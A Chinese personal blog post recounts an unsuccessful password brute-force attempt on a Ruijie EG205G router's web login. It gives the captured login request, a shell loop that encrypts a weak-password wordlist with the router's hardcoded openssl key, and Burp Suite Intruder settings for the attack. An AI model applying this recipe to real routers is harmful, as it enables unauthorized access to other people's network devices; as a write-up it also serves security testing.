文章 19
评论 1
浏览 94054
一次失败的锐捷睿易路由器密码爆破_eg205g_burpsuite

一次失败的锐捷睿易路由器密码爆破_eg205g_burpsuite

1.找接口和参数

POST /cgi-bin/luci/api/auth HTTP/1.1
Host: 192.168.110.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 153
Origin: http://192.168.110.1
Connection: close
Referer: http://192.168.110.1/cgi-bin/luci/?stamp=1657873765
Cookie: __APP_LANG__=zh_cn

{"method":"login","params":{"password":"U2FsdGVkX1+FRLpX94bIYSyMN7tYRd9ldwxaPcTePu0=","username":"admin","time":"1657873842","encry":true,"limit":false}}

认证是走的POST,URL里面也有一个参数是时间戳,请求的payload是json格式,这段json里面只考虑看两个字段,timestamp和password。

2.字典生成

password字段是“加密”了的,想用burpsuite的intruder模块去爆破这个接口的话,干脆简单一些,字典文件写成是“加密”后的猜解密码。
“加密”方式在网页的javascript里面有,在固件中后端脚本文件的"adminCheck"模块中也能找到。
那么直接生成字典吧:

while read line
do
    echo $line | openssl enc -aes-256-cbc -a -k 'RjYkhwzx$2018!' -md md5 2>/dev/null
done < cleartext_weakpass.txt

3.intruder填写爆破配置

image.png

攻击模式pitchfork,设置了三个payload点,1和3是时间戳,2是密码,剩余参数保持不变。
载荷1选择通过拓展插件生成,拓展插件选择成“current epoch time”,这个插件可以再bapp store里面下载安装(需要jpython包),之后负载3设置为和负责1相同
image.png
载荷2选择生成的密码字典文件,还需要把这个载荷的“url编码”给关掉,因为加密后的密码是base64编码,会有等号等字符,如果不关掉这个,最后会出问题
image.png

4.运气不好没碰上密码

虽然最后burpsuite发的包看起来和浏览器里面的好像区别不大了,但是运气不好。。。路由器密码太复杂了。

image.png


标题:一次失败的锐捷睿易路由器密码爆破_eg205g_burpsuite
作者:erlkonig
地址:https://erlkonig.tech/articles/2022/07/20/1658328744212.html

记录精彩的程序人生

取消